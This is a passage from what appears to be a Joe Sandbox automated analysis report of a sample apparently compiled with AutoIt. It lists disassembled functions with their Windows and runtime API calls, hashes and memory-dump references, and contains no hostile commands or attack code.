                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: 0$2
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 93392585-3793063076
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a5f6d3c146e885c54ead74f35c39eec4acd60bc9fc93d28bc39e3d14768ea649
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f01c363b391305104942df3bb39f3e86dedaf87795108832ec1df4cdc4019c53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B55192719002099BDB11DF69D888BAF7BB4BB44319F14853EEC15DB282D3B8984CCB66
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004352C2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 004352E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 00435320
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 00435340
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00435373
                                                                                                                                                                                                                                                                                                                                                                                                                                • VariantClear.OLEAUT32(?), ref: 004353B3
                                                                                                                                                                                                                                                                                                                                                                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 004353F6
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ArrayDataSafeVariant$ClearUnaccess$AccessChangeType
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: crts
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 586820018-3724388283
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: e94501f388d0d73ced66c0aa9444ce68fa972137b9c89e1913ae9ea64c05cbbc
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 545d374044e3945891266c858ffc3b068b1e43ab9a1ba77500f3c10b34ab4cdf
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE418BB5200208EBDB10CF1CD884A9AB7B5FF9C314F20852AEE49CB351E775E911CBA4
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044BBD2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105filestringCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,004A7F6C,0040F545,004A7F6C,004A90E8,004A7F6C,?,0040F545), ref: 0041013C
                                                                                                                                                                                                                                                                                                                                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 0044BC09
                                                                                                                                                                                                                                                                                                                                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 0044BC3F
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcscat.LIBCMT ref: 0044BCAF
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044BCBB
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 0044BCD1
                                                                                                                                                                                                                                                                                                                                                                                                                                • SHFileOperationW.SHELL32(?), ref: 0044BD17
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: File_wcslen$FullMoveNameOperationPath_wcscatlstrcmpi
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \*.*
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2326526234-1173974218
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: cfb238852dc788c6f4e4306d35388aa956c556a9525b71239849112dc74cb112
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dfa273c9728ae0aa44cf40aad3cddd2261aca17058b0337a789aafef13e29e40
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5C3184B1800219AACF14EFB1DC85ADEB3B5AF48304F5095EEE90997211EB35D748CB98
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 004335CD Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 90COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00433244: _wcsncpy.LIBCMT ref: 0043325C
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004335F2
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?), ref: 0043361C
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0043362B
                                                                                                                                                                                                                                                                                                                                                                                                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 0043363F
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcsrchr.LIBCMT ref: 00433666
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004335CD: CreateDirectoryW.KERNEL32(?,00000000), ref: 004336A7
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateDirectory$AttributesErrorFileLast_wcslen_wcsncpy_wcsrchr
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 321622961-2967466578
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 66c6ecc179b40ab72a0151a8d865592f5e80cbeaaa2383c239fb12261b929cf9
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: bb0dad1fe383a450cc5ca78da39c882eba2540a6c71c70dd25c8590f96c38e52
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C72129719013146ADF30AF25AC06BEB73AC9B05715F10569AFD18C2241E6799A888BE9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0044C7DD Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 88COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __wcsnicmp
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: d05ed79ef8649e951018b8bbb1c2d61e3c33a7345c6b0b1fc41c187b8edaa79f
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8f8f9edfa5db0492502b932a8328ea4ae50c7534afe07431ae24ccbcd5f30aff
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1221003365151066E72176199C82FDBB3989FA5314F04442BFE049B242D26EF99A83E9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434034 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 49windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,004A90E8,?,00000100,?,004A7F6C), ref: 00434057
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00434060
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00434075
                                                                                                                                                                                                                                                                                                                                                                                                                                • LoadStringW.USER32(00000000), ref: 00434078
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wprintf.LIBCMT ref: 004340A1
                                                                                                                                                                                                                                                                                                                                                                                                                                • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004340B9
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • %s (%d) : ==> %s: %s %s, xrefs: 0043409C
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: HandleLoadModuleString$Message_wprintf
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: %s (%d) : ==> %s: %s %s
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3648134473-3128320259
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3f99f1473d628bc1a501e0113e735bb0cc043e2cca9b2706ac47da9b95460e2a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5806584fae846cee426602f55e287a2c1afdddb79e6f9c87a69d5249cd46d2cb
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: EB016CB26903187EE710E754DD06FFA376CEBC4B11F00459AB708A61C49AF469848BB5
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0041793C Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048D148,00000008,00417A44,00000000,00000000,?,004115F6,?,00401BAC,?,?,?), ref: 0041794D
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417981
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004182CB: __mtinitlocknum.LIBCMT ref: 004182E1
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004182CB: __amsg_exit.LIBCMT ref: 004182ED
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004182CB: EnterCriticalSection.KERNEL32(004115F6,004115F6,?,00417986,0000000D,?,004115F6,?,00401BAC,?,?,?), ref: 004182F5
                                                                                                                                                                                                                                                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(FF00482A), ref: 0041798E
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 004179A2
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___addlocaleref.LIBCMT ref: 004179C0
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: KERNEL32.DLL$pI
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 637971194-197072765
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a50d44c6e21ae10dfe2421e8c890a682036196f235240147777d58dc068d601e
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: de2ab6b473c2d5586c9f362b8c2f57dc22cd34abb7029a86a899895714b74b87
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A401A171404B00EFD720AF66C90A78DBBF0AF50324F20890FE496536A1CBB8A684CB5D
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 0046822A Relevance: 12.3, APIs: 8, Instructions: 267COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmove$_malloc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1938898002-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: bb51e0d14dcfee45c4d36839732496dc4400bff611838f67d83ec86e680bb9ef
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ed671e0929b530e8a80a3994f14b14e6c4fa5d49d1ff8bec0f484948025a4d18
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FC81CB726001195BDB00EF66DC42AFF7368EF84318F040A6FFD04A7282EE7D995587A9
                                                                                                                                                                                                                                                                                                                                                                                                                                Function 00434EC4 Relevance: 12.1, APIs: 8, Instructions: 115memoryCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00434EE8
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F0B
                                                                                                                                                                                                                                                                                                                                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00434F37
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 00434F3E
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00434F64
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysFreeString.OLEAUT32(?), ref: 00434F6D
                                                                                                                                                                                                                                                                                                                                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 00434FA8
                                                                                                                                                                                                                                                                                                                                                                                                                                • SysAllocString.OLEAUT32(?), ref: 00434FB6
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3761583154-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 077a930adce2e2e575ae573d9966b00f654a320f8e1671167757538259768175
